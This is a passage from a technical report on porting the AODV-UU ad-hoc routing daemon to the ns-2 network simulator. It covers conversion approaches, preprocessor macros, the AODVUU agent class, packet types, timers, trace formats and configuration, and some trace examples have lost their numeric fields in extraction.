aodv_ socket_read() function of the aodv_socket module, whereas data packets are received by the packet_ input() function of the packet_input module. In ns-2, routing agents receive all incoming packets through a single recv() (receive) method. Packet types and contents have to be analyzed by this method to determine how packets should be processed. There are no sockets available, but agents achieve similar functionality by attaching themselves to the port classifier of a node, specifying the port number of interest. It should be noted that routing agents always are attached to port number 255 (RT_PORT) of a node, and hence, the port number for exchanging routing protocol control packets is 255 rather than any other port number (e.g. 654 in the case of AODV). Packet types In ns-2, packet types have to be created manually for specific purposes. Many common packet types are builtin, but they may not be as easy to use as in the real world. For instance, UDP packet processing would require the usage of a special Agent/UDP transport agent, which makes it more difficult for other agents to utilize UDP as part of their operation. A real-world application (such as the AODV-UU routing daemon) could use UDP sockets for the same purpose, without experiencing problems related to its position in the network stack. Packet direction The kernel module of AODV-UU uses Netfilter hooks for determining whether a packet is an incoming packet or an outgoing packet, and whether it should be routed or passed on to the system for forwarding. In ns-2, the 56 66 direction of a packet can be determined by analyzing the direction_ field of its common header. This field is set to DOWN, UP or NONE depending on the direction of the packet. DOWN indicates that the packet is an outgoing packet, and UP that it is an incoming packet. Packet transmission The AODV-UU routing daemon sends outgoing packets through sockets, which are then caught by the hook for locally generated packets, NF_IP_LOCAL_OUT, processed by AODV-UU, caught by the post-routing hook, NF_IP_POST_ROUTING, and finally forwarded by the system. In ns-2, routing agents instead hand all outgoing packets to their default target (the link layer) after filling in the next_hop_ field of the common header. As a sidenote, this makes routing agents differ somewhat from other agents, whose default target instead is the node entry to allow generated packets to arrive at the routing agent for forwarding Kernel interaction AODV-UU uses kernel interaction for updating the kernel routing table (the k_route module), sending ICMP messages to an application (the icmp module) and receiving packets on Netfilter hooks (the kaodv module). Obviously, no kernel interaction should be part of the execution of an ns-2 routing agent; the only environment offered to the routing agent is the ns-2 environment. The routing table is kept internal to the routing agent, ICMP messages are not passed to applications (because of the very limited application API upcalls provided by ns-2) and reception of packets is entirely performed through the recv() method of the routing agent Variables The variables in the AODV-UU source code affect each routing daemon process separately. In ns-2, any variables exposed to the C++ environment will be globally available. Therefore, the instantiation of routing agents in ns-2 requires variables to be local to each routing agent instance. Global variables Global variables are used in AODV-UU for sharing global settings, such as configuration options, between all modules. It is a convenient way of sharing simple data, to avoid passing around information data structures everywhere. However, global variables of AODV-UU modules must not be global in a routing agent implementation. If they were, all routing agents would share the same variables, interfering with each other. Instead, these variables must be local to each routing agent instance. Static variables Static variables offer hiding of information and functions from other modules, and are important for a modularized software development in C. However, this information hiding may be unnecessary in an ns-2 routing agent, depending on whether a modularized approach is desired within the routing agent or not. AODV-UU uses static variables e.g. for hiding functions that should only be called from within a certain module and for hiding variables associated with a single module, such as the seeking list of the seek_list module and the send and receive buffers of the aodv_socket module Timers The AODV-UU routing daemon uses the timer of select() for scheduling the checking of its own timer queue in the timer_queue module. Handler functions are executed as timers expire, and the timeout of the select() timer is updated when events have been carried out. In ns-2, timers of the TimerHandler class are available for agents and other network objects to use, thereby allowing similar functionality to be achieved. A timer in ns-2 could replace the select() timer and 57 67 examine the timer queue of the timer_queue module upon expiration. It should be noted, however, that such a timer would have to exist for each routing agent instance, since packet handling of different routing agent instances should be separate Logging The logging portions in the debug module of AODV-UU pose yet another problem. In ns-2, these logging features have to be modified to allow for individual logging of events for each routing agent instance. Such a modification would have to use a sensible logfile naming scheme to avoid ambiguities Non-applicable features AODV-UU has a number of features that are not relevant or directly applicable to simulations, for one reason or another. These features are listed below. Internet gateway support. This feature implies that the host is connected to the Internet, allowing itself to function as a gateway for other nodes in the ad-hoc network. Such a feature is normally handled by base stations in a wireless LAN, which are connected to a wired network. However, since no Internet access is available in ns-2 simulations, this feature does not apply. Also, the experimental support for multiple wireless channels and network interfaces in ns-2 would currently make an implementation of such a feature cumbersome. Specifying network interfaces to attach to. This does not apply to routing agents in ns-2, since their only means of communication is through a link layer, not through network interfaces. A routing agent does not know the exact layout of the network stack. Daemon mode. The daemon mode option of AODV-UU refers to detaching the agent from the console during startup by closing the stdin, stdout and stderr streams and executing the daemon in the background. This does not apply to routing agents in ns-2, since it is the ns-2 simulator itself that possibly should be detached from the console. Network components execute as part of the ns-2 environment, not as separate processes. Version information and online help. This is not very useful in ns-2 simulations. The version of the AODV-UU routing agent, if considered important, should be made known to the user prior to installation. Similarly, the user should read the documentation accompanying the AODV-UU routing agent prior to running it, as with any other software. 6.6 Different approaches of conversion Given the task of porting AODV-UU to run in the ns-2 network simulator, a number of conversion approaches are possible. Each approach determines how the original source code should be handled, and the results of a conversion. The approaches that have been considered are described in the following subsections, along with their respective advantages and disadvantages. The choice of a conversion approach heavily depends on the existing source code and the environment in which it should be executed. Therefore, the considerations described in section 6.5 should be kept in mind when such a choice is made. Finally, it should be noted that the approaches described here by no means are the only possible ones. Any programmer with good skills in analyzing source code, and perhaps some imagination, could create hybrid approaches to suit the conversion task at hand. 58 68 6.6.1 Monolithic class approach In a monolithic class approach, all source code is placed in a single class. The resulting class need not have any relationship with other classes; it could exist on its own as a stand-alone class. The main advantage of this approach is its simplicity. It is very easy to incorporate existing source code into a single class, since there is no doubt about where to place the code. However, there are disadvantages as well. Name clashes of identifiers could cause problems, unless the original source code utilizes a decent scheme for naming functions and variables. Also, any structure prior to the conversion is lost, since all parts are collapsed to form the monolithic class. Therefore, this approach may be unsuitable for well-structured source code with a large number of similar identifiers Object-oriented approach In an object-oriented approach, the intention is to arrange the original source code to form classes, of which objects may be instantiated. The suitability of this approach depends on the layout of the original source code and the ambition of the programmer. If the original source code lacks a modular structure, the conversion task could become tedious and very time-consuming. On the other hand, if the original source code is divided in separate modules, each with a clearly assigned task, these modules could form a good basis for the construction of corresponding classes. However, the programmer may still consider the task of converting a non-object-oriented program into an object-oriented one by preserving the original source code an inappropriate way of obtaining the desired results. It may be better to apply an object-oriented analysis to the original problem, and write an object-oriented version of the program from scratch Daemon approach In a daemon approach, programs that execute as separate processes can be used as-is, provided that an appropriate interface is written and connected to the application wishing to use these processes. The advantage of this approach is that the original source code may remain unchanged. The problem instead lies in the ability to establish communication with the interface software. For instance, AODV-UU routing daemons could be attached to virtual network interfaces, and software between these virtual network interfaces and the ns-2 network simulator could convert data as needed. Hence, the complexity of modifying the original source code has moved to the interface software and its associated communication. An important aspect (and a disadvantage) of the daemon approach is resources. It may not be possible to execute many daemons in parallel because of resource constraints. For instance, a large number of routing daemons running concurrently would not only consume a considerable amount of memory; they would also increase the workload of the machine on which they are executed. Furthermore, the daemon approach may be unsuitable because of constraints of the application utilizing the daemon processes. For instance, the application may not be able to keep up with the amount of data generated by all daemon processes in real-time. Finally, the real-time aspect itself may be a big disadvantage even though the application is able to cope with the data generated by the daemon processes, if the fastest possible execution is desired. 6.7 The porting process In this section, one of the conversion approaches is selected and the task of porting AODV-UU to run in the ns-2 network simulator is described in detail. The resulting source code of this conversion, i.e., the source code of AODV-UU version 0.5, is available from the AODV-UU homepage [6] Choice of conversion approach For the porting of AODV-UU to run in the ns-2 network simulator, the monolithic class approach was chosen. The reasons for this choice were the following: 59 69 The contents of the source code does not justify creating classes for instantiation of objects. Entries of linked lists, such as routing table entries and seeking list entries, are the only dynamically allocated objects that would be useful to instantiate. Most other objects exist in only one instance. The simplicity of the monolithic class approach. During the initial phase of the project, it was uncertain whether a conversion was possible, and to what extent the original source code would have to be modified. The layout of routing agents in ns-2. Most routing agents contain only one (or very few) modules to be compiled with ns-2. A daemon approach would require usage of the real-time scheduler of ns-2. This scheduler has proven to work poorly, complaining about system time running backwards and crashing the simulator. These problems have been reported by several ns-2 users on the ns-users mailing list [57] as well. Furthermore, usage of the real-time scheduler does not utilize the full processing capability of the simulator and the computer. Time-consuming simulation scenarios would take a long time to run. Finally, it was not clear how the interface between AODV-UU routing daemons and the simulator should be realized. The goal of the project was not to create an object-oriented version of AODV-UU, but to use the existing (non-object-oriented) source code with as little modifications as possible Conceptual overview The ideas proposed for the porting process were the following. The original source code should form a single, monolithic C++ routing agent class, which should be possible to instantiate in the ns-2 environment (both in C++ and OTcl). Parts of the original source code should be automatically extracted and put into the correct places of this class by the preprocessor. This involves one or more passes of source code extraction for each source code file, using preprocessor directives and macros. Such preprocessing constructs should be logically defined such that they do not affect the original source code during normal compilation, i.e., compilation of an AODV-UU routing daemon. Furthermore, the separate compilation of each module of AODV-UU should be preserved. The details of the porting process are described in the following subsections The AODVUU class The AODV-UU routing agent class is called AODVUU, and its definition is placed in an aodv-uu.h header file. The main methods of this class, offering basic routing agent functionality, are placed in a corresponding aodvuu.cc source code file. OTcl linkage is performed in aodv-uu.cc by a static TclClass instance Methods All function definitions in the AODV-UU source code are prepended with a special NS_CLASS macro, which defines these functions to be methods of the AODVUU class. Their declarations are automatically placed inside the class by the preprocessor, as described in section The following are the main methods of the AODVUU class: AODVUU(nsaddr_t id) is the constructor of the AODVUU class, and takes the node ID of the node to which the routing agent is attached as an argument. It sets up an AODV-UU packet type by calling the Agent base class constructor with the packet type as a parameter. A faked network interface with the name nsif is created, and its parameters are initialized using the address of the agent. The constructor also binds configuration variables to the OTcl environment, initializes the data structures of AODV-UU (the timer queue, routing table and packet queue) and calls initialization methods of other modules. AODVUU() is the destructor of the AODVUU class. It destroys the contents of the routing table, destroys any packets buffered by the packet_input module, and closes the logfiles. 60 70 void schedulenextevent() checks the next event to occur in the timer queue of the timer_queue module, and schedules an ns-2 timer of the AODVUU class to expire at the time of that event. This method should be called as soon as it is possible that the timer queue has changed, e.g. after processing packets. This construct is the equivalent of the select() timeout used in the AODV-UU routing daemon. void recv(packet *p, Handler *) is the receive method of the AODV-UU routing agent. This method receives all packets that are either destined for the routing agent or should be forwarded. It differs between AODV routing control packets and data packets, and either calls the recvaodvuu Packet() method of the aodv_socket module or the processpacket() method of the packet_input module. After reception of a packet, the timer queue is rescheduled, since it may have changed as an effect of the packet processing performed by AODV-UU. void packetfailed(packet *p) will receive packets returned from the link layer, when the link layer finds out that a packet cannot reach its next-hop destination due to communication range limitations or other events hindering the transmission. The usage of this method depends on whether link layer feedback has been enabled (by defining AODVUU_LL_FEEDBACK during compilation) or not. The purpose of this method is to mark failed routes as down, and to drop the failed packet with the DROP_ RTR_MAC_CALLBACK reason to indicate that the delivery failed due to errors at the link layer. void sendpacket(packet *p, u_int32_t next_hop, double delay) schedules the sending of a packet to the link layer using the supplied next-hop information and the desired delay. If link layer feedback has been enabled, information is added to the packet so that it will be possible to call a link layer callback method of the AODVUU class, link_layer_feedback(), in case a transmission of the packet would fail at the link layer. int startaodvuuagent() starts the AODV-UU routing agent. It checks that the routing agent has been initialized properly, sets up the wait-on-reboot timer, schedules the sending of HELLO messages (if link layer feedback is not used), initializes logging, and reschedules the timer queue. This method either returns TCL_OK if the routing agent was started properly, or TCL_ERROR if it failed. void link_layer_feedback(packet *p, void *arg) is called when the transmission of a packet fails at the link layer. It calls the packetfailed() method of the supplied AODV-UU routing agent instance with the failed packet as a parameter, allowing the failure to be handled. gettimeofday() overrides the usual gettimeofday() functionality offered by <sys/time.h>. It is used by the timer_queue module to schedule timeouts and by the debug module for logging events. The value returned by this method corresponds to the current notion of time of the ns-2 scheduler, with each simulation starting at 00:00:00 (GMT) on January 1, This allows simulations to be performed without the ns-2 real-time scheduler, since the notion of time presented to the AODV-UU routing agent follows that of the simulator. if_indextoname() overrides the ususal if_indextoname() function offered by <net/if.h>. It is used by logging functions of the debug module for finding the name of a network interface, given its interface index Source code extraction The extraction of source code from the original source code files of AODV-UU for inclusion in the AODVUU class is perhaps the most important part of the porting process. It allows the original source code files to remain (almost) unchanged, and the construction of the AODVUU class to be easily performed. It should be noted that the objective of this source code extraction is not to put all source code into a single file. Rather, source code extraction is used for creating the declaration of the AODVUU class. The actual methods of this class remain in their original modules, each yielding an object (.o) file during compilation. These object files are then combined during linking to form the complete AODV-UU routing agent. 61 71 Macros The macros used in the ported version of AODV-UU are listed below. #ifdef MACRO and #ifndef MACRO constructs together with these macros allow code segments to be selectively included or excluded by the preprocessor. The reason for negating some of the macros is that if none of them are defined, AODV-UU should compile as usual, resulting in an AODV-UU routing daemon. NS_PORT should be defined during the compilation of an AODV-UU routing agent, i.e., during the porting of AODV-UU to ns-2. It is used in.c files for excluding variable initializations (which must instead be performed in the AODVUU constructor) and for excluding #include directives. In the ported version, all.c files will rely on a single header file, aodv-uu.h, for all method and variable declarations. NS_NO_GLOBALS is used for indicating that global includes and variables, such as standard include files and global variables, should not be part of the compilation. This macro is used in.h files for allowing the AODVUU class to exclude globals during source code extraction. NS_NO_DECLARATIONS is used for indicating that method declarations should not be part of the compilation. This macro is used in.h files for allowing the AODVUU class to exclude method declarations during source code extraction. NS_CLASS is used for prepending function definitions in the AODV-UU source code with the name of the AODVUU class. It expands to AODVUU::, and makes the affected functions members of the AODVUU class. NS_OUTSIDE_CLASS is used for calling global functions from within the AODVUU class, whose names collide with methods inside the class. For instance, close() is such a function. If NS_PORT is defined, this macro expands to the :: scope operator of C++. NS_STATIC is used for removing the static keyword of function definitions. This is done because such functions, hidden from other modules through the static keyword, should not be shared by all instances of the AODVUU class in the ported version. (They will typically refer non-static data.) AODV_UU is used in ns-2 source code files for selectively including code segments that only apply to AODV-UU. Also, some macros are used for other definitions associated with the ported version of AODV-UU: NS_DEV_NR is the index of the (virtual) network device in the devs array of the current host, i.e., the AODV-UU routing agent. It is set to zero, since only one network device is supported. NS_IFINDEX is the interface index of the (virtual) network interface. It is set to the same value as NS_DEV_NR, since only one network interface is supported. AODV_LOG_PATH_PREFIX is used for defining the filename prefix of logfiles generated by AODV-UU routing agents. The default is aodv-uu_. AODV_LOG_PATH_SUFFIX is used for defining the filename suffix of logfiles generated by AODV-UU routing agents. The default is.log. AODV_RT_LOG_PATH_PREFIX is similar to AODV_LOG_PATH_PREFIX, but for routing table logfiles. The default is aodv-uu_rt. AODV_RT_LOG_PATH_SUFFIX is similar to AODV_LOG_PATH_SUFFIX, but for routing table logfiles. The default is.log. 62 72 Construction of the AODVUU class The aodv-uu.h header file of the AODVUU class is organized in the following way (items are listed in order): A check is made to ensure that NS_PORT has been defined. This indicates that AODV-UU is to be compiled as an ns-2 routing agent. Header files needed from ns-2 are included. These allow packet types, timer classes, random generators and trace file support to be used. A forward declaration of the AODVUU class is made. This is needed to be able to reference the class before it has been completely defined. The modules of AODV-UU need to know about the class during the source code extraction, e.g. for declaring member function pointer variables for timers. Global definitions of AODV-UU are included, i.e., params.h and defs.h. These are needed by all parts of AODV-UU, and are therefore included on a global level. Global data types, defines and global declarations are selected and extracted from all header (.h) files of AODV-UU. This is done by defining NS_NO_DECLARATIONS, so that no method declarations will be extracted, and by undefining NS_NO_GLOBALS, to ensure that the desired parts of the header files are extracted. #include directives perform the actual source code extraction. A timer class, TimerQueueTimer, is defined. This class is used for instantiating an ns-2 timer, tqtimer, which serves as a replacement for the select() timer used by the AODV-UU routing daemon. The intention of this timer is to keep track of upcoming events in the timer queue of the timer_ queue module. The AODVUU class is declared. Its public and protected methods are declared. Method declarations from the header (.h) files of AODV-UU are selected by defining NS_NO_GLOBALS and undefining NS_NO_ DECLARATIONS, and extracted with #include directives. For this extraction to work, the macro defined by each header file has to be undefined with #undef AODV_MODULE_H first, since the header file has already been included once before. This is followed by declarations of member variables that were previously global (taken from the main module), or that were static and placed in some of the other modules. The initialization of these variables is performed in the AODVUU constructor. The ifindex2devindex() method from defs.h is placed below the AODVUU class declaration. It is manually placed there because it needs the AODVUU class declaration to be able to reference member variables of the class. (Otherwise, an extra pass through defs.h would be needed to extract just one method.) Notes on source code extraction Obviously, the chosen approach does not entirely rely on automatic source code extraction for the construction of the AODVUU class. Static variables of modules have been manually moved into the class, and their initializations are performed in the constructor. This is a trade-off between automation and the number of passes needed for the preprocessor to extract the source code and put it into the AODVUU class Packet types and headers To allow AODV-UU routing agents to communicate with each other, a special PT_AODVUU packet type and PacketHeader/AODVUU packet header was added to ns-2. This is in contrast with the AODV-UU routing daemon, which uses UDP for its AODV control packets. The reasons for this decision were the following: Introduction of a separate packet type allows for easy tracing of packets of this type. No existing trace code has to be modified to suit the specific tracing needs of the packet type; instead, custom-made tracing code may be supplied. 63 73 UDP packet processing would complicate the AODV-UU routing agent, since it would require usage or subclassing of the Agent/UDP transport agent. Also, the UDP packet type would offer no significant advantages over a custom-made packet type. The approach with separate packet types has become a de facto standard in ns-2. A majority of all agents implement their own packet types. The AODV-UU packet type An AODV-UU packet type, PT_AODVUU, was added to be able to reference AODV-UU routing control packets in simulations. It was inserted into the the packet_t enumeration in ns/common/packet.h. Also, the name of the packet type was set to AODVUU in the constructor of the p_info class. To enable the usage of this packet type in OTcl, its name was added to the protocol enumeration in ns/tcl/lib/ns-packet.tcl. The AODV-UU packet header The AODV-UU packet header (PacketHeader/AODVUU) was based on the existing AODV_msg message type of AODV-UU, defined in defs.h. The following additions were made: A static inline variable, offset_, was added. This variable is required by the PacketHeaderManager of ns-2 for storing packet header offsets for each packet header during startup, and can be used for accessing the AODV-UU packet header of packets. A static inline method, offset(), was added. This method returns the offset mentioned above. An access method, AODV_msg *access(const Packet *p), was added. This method allows the AODV-UU packet header to be accessed in packets. It is a shorthand for retrieving the packet header offset and accessing the packet using that offset. A type definition was made, to allow the AODV_msg struct to be referred to as hdr_aodvuu. This is a recommended naming convention of ns-2. An access macro, HDR_AODVUU(p), was defined. It is a shorthand for calling the access() method of the hdr_aodvuu type to retrieve the AODV-UU packet header of a packet p. The packet header was made available to OTcl by creating a static class, AODVUUHeaderClass, and instantiating it as class_rtprotoaodvuu_hdr in aodv-uu.cc. In the constructor of AODVVUUHeaderClass, the PacketHeaderClass base class constructor is called both with the desired OTcl class name of the packet header (PacketHeader/AODVUU) and the size of the packet header. This size is set to be the maximum AODV message size, as defined by AODV_ MSG_MAX_SIZE in aodv_socket.h. This is to reserve space for the largest AODV message allowed (a RERR message with 100 unreachable destinations). AODV-UU packet header usage The AODV-UU packet header, once enabled, is part of all ns-2 packets. Since the size of the packet header is fixed, each packet will carry a constant amount of additional data as a consequence of this. This, however, does not mean that the size of AODV-UU packets will appear as a constant value in trace logs. The amount of meaningful information in a packet of the AODV-UU packet type, plus the size of the IP header, is set in the size_ field of its common header prior to sending the packet. In the same way, the effective AODV-UU packet size is calculated from the size_ field of the common header upon packet reception. The size of the IP header is subtracted from the size_ value, giving the effective AODV-UU packet size. This value can then be used when parsing the information contained in the packet. It should also be noted that no special conversion of the AODV packet data is performed in the ported version of AODV-UU. The data is stored in network byte order, just like in the conventional version of AODV-UU. 64 74 6.7.7 Packet buffering and handling The internal packet buffering of AODV-UU performed in the packet_queue module had to be modified to buffer the actual packets rather than their packet IDs provided by Netfilter, since Netfilter is not available in the ns-2 environment. The required changes were applied to the packet_queue module of AODV-UU. The packet handling of the AODV-UU routing agent is almost identical to that of the AODV-UU routing daemon; the difference is that all packets arrive through the recv() method of the routing agent instead of through different sockets. The packet type is analyzed in the recv() method, after which the correct handler method (recvaodvuupacket() of the aodv_socket module or processpacket() of the packet_input module) is called Addressing The addressing in AODV-UU assumes a 32-bit unsigned integer value, representing the IP address. The ns-2 addressing scheme uses signed 32-bit integers for its node IDs, as described in section However, this does not pose any specific problems for the AODV-UU routing agent. Nodes are never assigned negative node IDs, so the routing agent can safely type cast its node ID into an IP address. The IP address is stored in the structure for network device information of AODV-UU, and is used e.g. for setting the source address when sending packets Timers The existing timer queue module of AODV-UU, timer_queue, was kept intact in the ported version. To replace the select() timer used by the AODV-UU routing daemon, a special timer subclass of the TimerHandler class was constructed, TimerQueueTimer, and instantiated as tqtimer by the AODV-UU routing agent. Furthermore, the TimerQueueTimer class was made friend of the AODVUU class, so that it can access methods of AODVUU when the timer expires. (Details on timers are available in section 5.12.) The tqtimer timer is kept synchronized with the timeout of the next upcoming event of the timer queue in the timer_queue module. When it expires, it calls the timer_age_queue() method of the timer_queue module. This method checks for any expired timeouts, executes any corresponding events, and returns the new timeout of the timer queue. This value is used for rescheduling the tqtimer timer, to once again synchronize it with the timer queue. It should be noted that it is the responsibility of the programmer to make sure that this timer synchronization is performed, by calling the schedulenextevent() method of the AODVUU class whenever it is possible that the timer queue has changed. However, the timer queue can only change during the processing of an AODV message, or as a side-effect of expired timers, so it is rather easy to enforce this policy. Finally, a comment should be made regarding the calling of timer handler functions. The AODV-UU routing agent required the calls to timer handler functions (and the setting of timer handler functions when creating timers) to be modified. This was because of the instantiation of routing agents; each such handler function is associated with a certain routing agent instance. Therefore, references to timer handler functions were made instance-aware by utilizing the NS_CLASS macro and this pointers, pointing to the current routing agent instance. This can be seen in the modified source code of AODV-UU wherever a timer handler method is assigned or called. Details on function pointers in C++ are available in [53] Logging The logging portions of the AODV-UU debug module were slightly modified to allow for the instantiation of routing agents. Filename prefixes and suffixes for general logfiles and routing table logfiles were added to defs.h. The log_init() function of the debug module was modified to construct filenames for logfiles from these prefixes, suffixes and the IP address of the routing agent (i.e., the node). The resulting filenames could e.g. be aodv-uu_ log and aodv-uu_rt_ log for a node with IP address (which is equal to a node ID of 1). This way, each routing agent writes log information to a unique set of logfiles. In addition, the IP address of the agent was added to each line in the general logfile to increase clarity. 65 75 Tracing Tracing support for the AODV-UU packet type was added using the tracing source code of the existing AODV routing agent in ns-2 as a template. The tracing source code is available in ns/trace/cmu-trace.{cc, h}. It was decided that the trace format should be equal to that of the existing AODV routing agent, to easily let users switch between the two implementations. The only difference in the tracing of AODV-UU packets is that the packet type field of the ns-2 trace log will read AODVUU instead of AODV. Finally, to perform this tracing, a conversion of the fields in the AODV-UU packet header was needed, since these are stored in network byte order but should be displayed in host byte order. The AODV-UU routing agent supports the old and the new trace format of ns-2, but not the tagged format. (Details on these formats are available in section ) In the following subsections, examples of the two supported formats are given for each possible AODV message type, and the fields relevant to AODV are explained. RREP and HELLO messages s _1_ RTR AODVUU 40 [ ] [1:255 0: ] [0x2 0 [1 0] ] (REPLY) (1)(2)(3) (5) (4) s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 40 -If 0 -Ii 24 -Iv 255 -P aodvuu -Pt 0x2 -Ph 0 -Pd 1 (1) (2) (3) -Pds 0 -Pl Pc REPLY (4) (5) s _0_ RTR AODVUU 40 [ ] [0:255-1: ] [0x2 0 [0 5] ] (HELLO) (1)(2)(3) (5) (4) s -t Hs 0 -Hd -2 -Ni 0 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 40 -If 0 -Ii 6 -Iv 1 -P aodvuu -Pt 0x2 -Ph 0 -Pd 0 (1) (2) (3) -Pds 5 -Pl Pc HELLO (4) (5) (1): Packet type. 0x2 = RREP. (2): Hop Count. (3): Destination IP Address (i.e., the node ID). (4): Destination Sequence Number. (5): Lifetime. It should be noted that since HELLO messages are RREP messages, the packet type (1) is 0x2 for HELLO messages as well. 66 76 RREQ messages s _0_ RTR AODVUU 44 [ ] [0:255-1: ] [0x1 0 0 [2 0] [0 1]] (REQUEST) (1)(2) (4) (6) (3) (5) (7) s -t Hs 0 -Hd -2 -Ni 0 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 44 -If 0 -Ii 1 -Iv 1 -P aodvuu -Pt 0x1 -Ph 0 -Pb 0 -Pd 2 (1) (2) (3) (4) -Pds 0 -Ps 0 -Pss 1 -Pc REQUEST (5) (6) (7) (1): Packet type. 0x1 = RREQ. (2): Hop Count. (3): RREQ ID. (4): Destination IP Address (i.e., the destination node ID). (5): Destination Sequence Number. (6): Originator IP Address (i.e., the originator node ID). (7): Originator Sequence Number. RERR messages s _1_ RTR AODVUU 32 [ ] [1:255 0: ] [0x3 1 [2 3] ] (ERROR) (1)(2)(3) (5) (4) s -t Hs 1 -Hd 0 -Ni 1 -Nx Ny Nz Ne Nl RTR -Nw --- -Ma 0 -Md 0 -Ms 0 -Mt 0 -Is Id It AODVUU -Il 32 -If 0 -Ii Iv 1 -P aodvuu -Pt 0x3 -Ph 1 -Pd 2 (1) (2) (3) -Pds 3 -Pl Pc ERROR (4) (5) (1): Packet type. 0x3 = RERR. (2): DestCount. (3): Unreachable Destination IP Address 1 (i.e., the node ID). (4): Unreachable Destination Sequence Number 1. (5): Lifetime. It should be noted that a lifetime field is not part of the RERR message. However, this field was logged by the AODV routing agent supplied with ns-2, because it handles several message types equally when logging them. The value of this field was always 0.0 because it was never initialized. For backward compatibility with the AODV trace log format, it is included in AODV-UU trace logs as well (always displaying a value of 0.0). 67 77 RREP-ACK messages Currently, AODV-UU does not utilize RREP-ACK messages since local repair has not been implemented yet. However, tracing support is in place. For RREP-ACKs, a line in the trace log would end in the following way:... [0x4] (RREP-ACK) (1)... -P aodvuu -Pt 0x4 RREP-ACK (1) (1): Packet type. 0x4 = RREP-ACK. It should be noted that RREP-ACK messages are not logged at all by the AODV routing agent supplied with ns-2, possibly because of the old version of the AODV draft (version 6) that it adheres to Excluded features and modules The non-applicable features of AODV-UU in ns-2 simulations have been reviewed in section These features were made unavailable in the ported version of AODV-UU by not binding the corresponding configuration variables to the OTcl environment, and enforcing their values in the constructor of the AODVUU class. Since the AODV-UU routing agent does not perform any kernel interaction or ICMP message sending, the kaodv, k_route, libipq and icmp modules were not used. Calls to functions of these modules where excluded using #ifndef NS_PORT directives in the source code Configuration and usage Configuration of the AODV-UU routing agent is done by changing the values of its instance variables. The available instance variables are described below. unidir_hack_ determines whether uni-directional links should be detected and avoided. rreq_gratuitous_ determines whether the gratuitous RREP flag should be set in RREQs. This flag is described in section expanding_ring_search_ determines whether expanding ring search should be used for RREQs. receive_n_hellos_ requires that a certain number of HELLO messages should be received from a node before it is treated as a neighbor. If used, it should be set to a value greater than or equal to 2. hello_jittering_ determines whether jittering of HELLO messages should be used. wait_on_reboot_ determines whether a 15-second wait-on-reboot delay should be used on startup. log_to_file_ determines whether a general logfile should be created. debug_ determines whether the events of the general logfile should be printed to the console (stdout). rt_log_interval_ determines the interval between loggings of the internal routing table of the AODV-UU routing agent. The value is specified in milliseconds, and a value of 0 disables routing table logging. In general, a value of 0 disables an option and a value of 1 enables it. No checking of the values is performed; it is the responsibility of the user to specify sensible values. 68 78 Default configuration The default configuration of the AODV-UU routing agent is shown in Table 6.1. The setting of these values is performed in ns/tcl/lib/ns-default.tcl. It should be noted that the HELLO jittering and wait-on-reboot settings differ from the default settings of the conventional AODV-UU routing daemon; the reason for this is that the AODV-UU routing agent applies a certain amount of jittering to all broadcast packets, and that a wait-on-reboot phase would be purely superfluous in simulations. Table 6.1: AODV-UU routing agent default configuration " unidir_hack_ 0 Off rreq_gratuitous_ 0 Gratuitous flag not set expanding_ring_search_ 1 Uses expanding ring search receive_n_hellos_ 0 Off hello_jittering_ 0 No HELLO jittering wait_on_reboot_ 0 No wait-on-reboot debug_ 0 No general logging to stdout rt_log_interval_ 0 No routing table logging log_to_file_ 0 No general logging to logfile Usage Changing of the AODV-UU routing agent configuration options should be performed in the simulation scenario script before the simulation is started with the run command of the simulator instance. This is preferrably done during node creation, as shown below. Also, for the AODV-UU routing agent to be used in a simulation, the -adhocrouting option of the node-config command of the simulator instance should be set to AODVUU.... $ns_ node-config -adhocrouting AODVUU for {set i 0} {$i < $val(nn) } {incr i} { set node_($i) [$ns_ node] $node_($i) random-motion 0 ;# disable random motion set r [$node_($i) set ragent_] ;# get the routing agent $r set debug_ 1 $r set rt_log_interval_ 1000 $r set log_to_file_ 1 }... Note how the routing agent is fetched from the mobile node; it is referenced by the ragent_ instance variable of the node. After the routing agent instance has been retrieved, the values of its instance variables can be changed as desired. Compile-time configuration The AODV-UU routing agent can also be set to either use link layer feedback or to use HELLO messages. This is determined during compilation, and is described in section 79 Extending the AODV-UU routing agent Because of the modular construction of the AODVUU class, it is easy to extend the AODV-UU routing agent whenever new modules are added to AODV-UU. The necessary steps are described below. It is assumed that the module to be added is written in C, but some of the steps apply to C++ modules as well. Module construction In its.c file, the module should only include aodv-uu.h if NS_PORT is defined, not any other modules. Standard includes are an exception; they are allowed regardless of the NS_PORT definition. All functions of the module should be prepended with the NS_CLASS macro, to make them member methods of the AODVUU class. In its.h file, the module should group standard includes and global datatypes using the NS_NO_GLOBALS macro. Such code segments should be included by the preprocessor if this macro is not set. Also, the module should group its function declarations using the NS_NO_DECLARATIONS macro. Such declarations should be included by the preprocessor if this macro is not set. Module addition The module should be added to either the SRC_NS or the SRC_NS_CPP variable of the AODV-UU Makefile (described in section ), depending on whether the module is written in C or C++. The header file of the module should be added outside the AODVUU class in aodv-uu.h, to extract global data types, defines and global declarations. During this extraction, the NS_NO_GLOBALS macro should be undefined, and NS_NO_DECLARATIONS defined. The module should be included inside the AODVUU class, to extract method declarations. This requires the macro defined by that module (e.g. AODV_MODULE_H) to be undefined with #undef AODV_ MODULE_H first, since parts of the module were already included on a global level, and hence, the macro was defined. During this extraction, the NS_NO_GLOBALS macro should be defined and NS_NO_DECLARATIONS undefined. Module compilation No extra steps are necessary for the compilation. Since the module was added to the AODV-UU Makefile, it will automatically become a part of the AODV-UU routing agent in ns General C vs C++ issues During the porting process, a number of conversion issues were encountered and had to fixed in the original source code. These issues were merely a result of the slightly fuzzy semantics of the C programming language (compared to C++), and most of them were only warnings. A detailed reference on C vs C++ issues can be found in [51]. Structs in C++ are classes. As such, their names should appear before the opening curly bracket, and the class definition should end with a semicolon following the closing curly bracket. This was achieved by using #ifdef NS_PORT directives, modifying the definition of the struct as needed. 70 80 The C++ compiler complained about several implicit type casts. This was solved by performing explicit type casts, after ensuring that these type casts would not affect the functionality of AODV-UU in an unexpected way. The most common instances of this issue were implicit type casts of void * pointers from malloc() calls. The C++ compiler did not allow the AODVUU class name to be part of the timer handler typedef in 